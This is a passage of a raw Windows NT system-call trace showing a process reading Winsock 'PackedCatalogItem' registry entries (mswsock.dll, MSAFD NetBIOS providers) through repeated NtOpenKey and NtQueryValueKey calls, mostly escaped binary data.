Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\33\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\06\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\06\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\07\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\06\07\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\08\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\08\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\09\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02614 896 NtClose (220, ... ) == 0x0 02615 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000016"}, ... 220, ) }, ... 220, ) == 0x0 02616 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02617 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02618 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\34\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0;\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0;\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0<\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\07\0<\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0=\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0=\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0>\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\34\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0;\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0;\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0<\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\07\0<\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0=\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0=\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0>\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0=\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0>\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\34\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\0;\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0;\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0<\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\07\0<\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0=\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0=\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0>\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02619 896 NtClose (220, ... ) == 0x0 02620 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000017"}, ... 220, ) }, ... 220, ) == 0x0 02621 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02622 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02623 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\35\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0@\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0@\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0A\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\08\0A\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0B\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0B\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\35\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0@\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0@\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0A\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\08\0A\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0B\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0B\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0B\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\35\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0@\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0@\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0A\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\08\0A\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0B\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0B\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0C\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02624 896 NtClose (220, ... ) == 0x0 02625 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000018"}, ... 220, ) }, ... 220, ) == 0x0 02626 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02627 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02628 896 NtAllocateVirtualMemory (-1, 1380352, 0, 4096, 4096, 4, ... 1380352, 4096, ) == 0x0 02629 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\36\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0F\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0F\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0G\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\09\0G\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0H\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0H\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0I\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\36\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\376\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0E\05\05\09\0B\00\0C\01\0-\0F\0A\04\06\0-\04\06\04\0D\0-\0B\0\0\0\0\0\204\3\0\0F\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0F\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0G\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\09\0G\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0H\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0